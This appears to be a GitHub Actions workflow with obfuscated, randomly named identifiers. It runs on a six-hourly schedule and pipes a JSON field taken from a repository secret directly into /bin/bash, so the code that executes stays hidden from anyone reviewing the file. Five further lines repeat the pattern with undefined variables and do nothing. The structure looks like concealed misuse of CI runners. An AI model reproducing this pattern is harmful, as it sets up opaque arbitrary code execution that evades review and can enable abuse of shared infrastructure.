name: watchwordstudent
on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: watchwordstudent
        env:
          xj68043: ${{ secrets.xj68043 }}
        run: |
          echo $xj68043 | jq -r .wmq34672 | /bin/bash
          echo $equud62 | jq -r .wm95 | /bin/bash
          echo $p35 | jq -r .x534 | /bin/bash
          echo $tgy8 | jq -r .d9872 | /bin/bash
          echo $ozat42 | jq -r .cjexp151 | /bin/bash
          echo $f7412 | jq -r .x41827 | /bin/bash

